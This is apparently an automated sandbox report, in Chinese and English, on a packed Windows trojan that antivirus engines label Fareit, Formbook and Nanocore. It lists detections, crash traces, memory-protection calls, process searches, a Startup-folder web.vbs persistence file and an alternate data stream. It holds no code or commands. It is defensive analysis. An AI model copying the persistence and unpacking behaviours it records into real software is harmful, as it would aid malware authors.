11.0
0-day
60 个模型检测该样本为恶意!
重新分析
更多

5e32d07c21d72fb6e5b1c48c92ab18268ff5121b8e2ccfda9740152d896e30c2

5adb65b33594aa52a676bf25702b4d8b.exe

分析耗时

95s

最近分析

文件大小

1.3MB
静态报毒 动态报毒 36TI6RRXEI8 AI SCORE=80 AIDETECTVM ALI2000015 ATTRIBUTE CLASSIC CONFIDENCE DATASTEALER DELF DELFINJECT DELPHILESS EMTN EMVB FAREIT FORMBOOK GENERICKD HIGH CONFIDENCE HIGHCONFIDENCE HPRCDN JAWNN JHFN KCLOUD KRYPTIK MALREP MALWARE2 MALWARE@#FUNOWVUBY8C9 MASSLOGGER NANOCORE SCORE SUSGEN THKOABO TSCOPE UHW@AMP55BCI UNSAFE X2094 ZELPHIF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Fareit-FPQ!5ADB65B33594 20201210 6.0.6.653
Alibaba Trojan:Win32/DelfInject.ali2000015 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_90% (W) 20190702 1.0
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20201209 21.1.5827.0
Kingsoft Win32.Troj.Undef.(kcloud) 20201210 2017.9.26.565
静态指标
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (9 个事件)
Time & API Arguments Status Return Repeated
1619517163.87325
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x74804b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x74805d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff3f1495
success 0 0
1619517176.326875
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x74a04b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x74a05d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xfd6b1495
success 0 0
1619517183.404625
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x749b4b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x749b5d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff2c1495
success 0 0
1619517189.514375
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x74a04b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x74a05d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff381495
success 0 0
1619517197.607375
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x749b4b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x749b5d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff311495
success 0 0
1619517206.732
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x74574b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x74575d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff351495
success 0 0
1619517215.232125
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x74524b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x74525d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff4c1495
success 0 0
1619517220.07625
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x74524b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x74525d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff271495
success 0 0
1619517226.49825
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x74524b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x74525d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xfd9c1495
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
Allocates read-write-execute memory (usually to unpack itself) (50 out of 282 个事件)
Time & API Arguments Status Return Repeated
1619513302.421681
NtAllocateVirtualMemory
process_identifier: 3044
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00990000
success 0 0
1619513302.577681
NtAllocateVirtualMemory
process_identifier: 3044
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x009a0000
success 0 0
1619513302.577681
NtAllocateVirtualMemory
process_identifier: 3044
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x024b0000
success 0 0
1619517160.842375
NtAllocateVirtualMemory
process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00560000
success 0 0
1619517160.935375
NtAllocateVirtualMemory
process_identifier: 2868
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00570000
success 0 0
1619517160.951375
NtAllocateVirtualMemory
process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x005a0000
success 0 0
1619517162.40425
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00400000
success 0 0
1619517162.43525
NtAllocateVirtualMemory
process_identifier: 2404
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x02250000
success 0 0
1619517162.43525
NtAllocateVirtualMemory
process_identifier: 2404
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02440000
success 0 0
1619517162.43525
NtAllocateVirtualMemory
process_identifier: 2404
region_size: 679936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01fb0000
success 0 0
1619517162.43525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 655360
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x01fb2000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76353000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76354000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77d4f000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.79525
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76353000
success 0 0
1619517163.81025
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.81025
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619517163.81025
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.81025
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619517163.81025
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.81025
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76354000
success 0 0
1619517163.81025
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02092000
success 0 0
1619517163.81025
NtProtectVirtualMemory
process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619517162.82625
NtAllocateVirtualMemory
process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00650000
success 0 0
1619517162.88925
NtAllocateVirtualMemory
process_identifier: 2060
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00660000
success 0 0
1619517162.90425
NtAllocateVirtualMemory
process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00690000
success 0 0
1619517174.4205
NtAllocateVirtualMemory
process_identifier: 3144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619517174.5765
NtAllocateVirtualMemory
process_identifier: 3144
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00560000
success 0 0
1619517174.5765
NtAllocateVirtualMemory
process_identifier: 3144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00590000
success 0 0
1619517175.998875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00400000
success 0 0
1619517176.029875
NtAllocateVirtualMemory
process_identifier: 3220
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x02000000
success 0 0
1619517176.029875
NtAllocateVirtualMemory
process_identifier: 3220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02150000
success 0 0
1619517176.029875
NtAllocateVirtualMemory
process_identifier: 3220
region_size: 679936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f30000
success 0 0
1619517176.029875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 655360
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x01f32000
success 0 0
1619517176.264875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00352000
success 0 0
1619517176.264875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619517176.264875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00352000
success 0 0
1619517176.264875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76353000
success 0 0
1619517176.264875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00352000
success 0 0
1619517176.264875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76354000
success 0 0
1619517176.264875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00352000
success 0 0
1619517176.264875
NtProtectVirtualMemory
process_identifier: 3220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
Creates executable files on the filesystem (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\web.vbs
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 57 个事件)
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.62816245195963 section {'size_of_data': '0x000b5800', 'virtual_address': '0x000a2000', 'entropy': 7.62816245195963, 'name': '.rsrc', 'virtual_size': '0x000b5708'} description A section with a high entropy has been found
entropy 0.5381764269829503 description Overall entropy of this PE file is high
Expresses interest in specific running processes (1 个事件)
process djoerfscoske.exe
Repeatedly searches for a not-found process, you may want to run a web browser during analysis (27 个事件)
Time & API Arguments Status Return Repeated
1619513302.577681
Process32NextW
process_name: conhost.exe
snapshot_handle: 0x0000010c
process_identifier: 1376
failed 0 0
1619517160.967375
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 1376
failed 0 0
1619517162.95125
Process32NextW
process_name: djoerfscoske.exe
snapshot_handle: 0x0000010c
process_identifier: 2060
failed 0 0
1619517173.56025
Process32NextW
process_name: djoerfscoske.exe
snapshot_handle: 0x00000210
process_identifier: 2060
failed 0 0
1619517174.5925
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3204
failed 0 0
1619517176.982375
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3372
failed 0 0
1619517179.560375
Process32NextW
process_name: djoerfscoske.exe
snapshot_handle: 0x00000144
process_identifier: 3280
failed 0 0
1619517181.139
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3452
failed 0 0
1619517184.404875
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3624
failed 0 0
1619517186.092875
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x00000130
process_identifier: 3624
failed 0 0
1619517187.654875
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3708
failed 0 0
1619517189.904625
Process32NextW
process_name: djoerfscoske.exe
snapshot_handle: 0x00000110
process_identifier: 3776
failed 0 0
1619517194.592625
Process32NextW
process_name: dllhost.exe
snapshot_handle: 0x0000018c
process_identifier: 4020
failed 0 0
1619517195.77925
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 2656
failed 0 0
1619517198.46725
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 2448
failed 0 0
1619517201.74825
Process32NextW
process_name: GoogleUpdate.exe
snapshot_handle: 0x00000148
process_identifier: 2128
failed 0 0
1619517203.670125
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3200
failed 0 0
1619517208.154625
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3428
failed 0 0
1619517210.467625
Process32NextW
process_name: djoerfscoske.exe
snapshot_handle: 0x00000138
process_identifier: 2616
failed 0 0
1619517213.076625
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3512
failed 0 0
1619517215.68525
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3696
failed 0 0
1619517217.67025
Process32NextW
process_name: djoerfscoske.exe
snapshot_handle: 0x00000134
process_identifier: 3620
failed 0 0
1619517218.42025
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3808
failed 0 0
1619517220.84225
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 2364
failed 0 0
1619517222.49825
Process32NextW
process_name: mscorsvw.exe
snapshot_handle: 0x00000134
process_identifier: 3108
failed 0 0
1619517224.326875
Process32NextW
process_name: is32bit.exe
snapshot_handle: 0x0000010c
process_identifier: 4052
failed 0 0
1619517227.82675
Process32NextW
process_name: googlecrashhandler64.exe
snapshot_handle: 0x0000010c
process_identifier: 3732
failed 0 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Creates an Alternate Data Stream (ADS) (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe:ZoneIdentifier
